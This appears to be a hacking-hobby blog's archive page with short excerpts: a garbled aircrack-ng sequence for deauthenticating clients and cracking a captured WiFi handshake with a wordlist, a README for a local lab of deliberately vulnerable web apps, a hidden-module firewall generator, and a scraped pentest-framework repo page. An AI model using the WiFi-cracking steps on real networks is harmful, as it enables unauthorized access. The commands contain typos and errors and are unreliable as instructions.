Skip to main content

Posts

Showing posts from 2020

Wifi password hacked

> airmon-ng start wlan0   > Iwconfig.           Check the mode. Monito >airodump-ng wlan0mon > airodump-ng  -c  -w capture -d bssid wlan0mon -c means channel.  -d means display > airplay-ng --deauth 0 -a bssid -c channel ID wlan0mon SeetSee wpa handskae  wait the capture the data  Check capture file capture-01-cap.  And check the eapol > airmon-ng stop wlan0mon >aircrack-ng capture-01-cap -w wordlist 

Get practice hacking on your own website

Local PentestLab Management Script Bash script to manage web apps using docker and hosts aliases. Made for Kali linux, but should work fine with pretty much any linux distro. Current available webapps bWAPP WebGoat 7.1 WebGoat 8.0 Damn Vulnerable Web App Mutillidae II OWASP Juice Shop WPScan Vulnerable Wordpress OpenDNS Security Ninjas Altoro Mutual Get started Using any of these apps can be done in 3 quick and simple steps. 1) Clone the repo Clone this repo, or download it any way you prefer git clone https://github.com/eystsen/pentestlab.git cd pentestlab 2) Install docker The provided docker install script is no longer needed. On Kali 2020 you can install docker using apt, like this: sudo apt install docker.io For any other distro, use the prefered way to install docker. 3) Start an app on localhost Now you can start and stop one or more of these apps on your system. As an example, to start bWAPP just run this command ./pentestlab.sh start bwapp...

Make secure your data. (Make 2 firewall )

HiddenWall HiddenWall is a Linux kernel module generator for custom rules with netfilter. (block ports, Hidden mode, rootkit functions etc).  The motivation: on bad situation, attacker can put your iptables/ufw to fall... but if you have HiddenWall, the attacker will not find the hidden kernel module that block external access, because have a hook to netfilter on kernel land(think like a second layer for firewall). My beginning purpose at this project is protect my personal server, now is protect the machines of my friends. When i talk "friends", i say peoples that don't know how to write low level code. Using the HiddenWall you can generate your custom kernel module for your firewall configuration. The low level programmer can write new templates for modules etc... First step, understand before run Verify if the kernel version is 3.x, 4.x or 5.x: uname -r Clone the repository git clone https://github.com/CoolerVoid/HiddenWall Enter the folder cd Hidd...

Website attack for sql and WordPress by "pure blood"

See Video  Click here Penetration Testing Framework created for Hackers / Pentester / Bug Hunter  cr4shcod3 pureblood python scanner pentest-toolkit framework   37  commits   1  branch   0  packages   0  releases   2  contributors  MIT Python Branch:   master   New pull request Find file Clone or download  cr4shcod3   Merge pull request   #12   from AlekKras/master   … Latest commit 2c5ce07 on Dec 8, 2018 Type Name Latest commit message Commit time imgs PureBlood Material Logo 2 years ago l33t Update wot.txt 14 months ago .gitignore Initial commit 2 years ago LICENSE Initial commit 2 years ago README.md Update README.md 2 years ago pureblood.py Possible fix? 16 months ago requirements.txt PureBlood v2 2 years ago  README.md Pure Blood       Pure Blood v2 A Penetration Testing Framework create...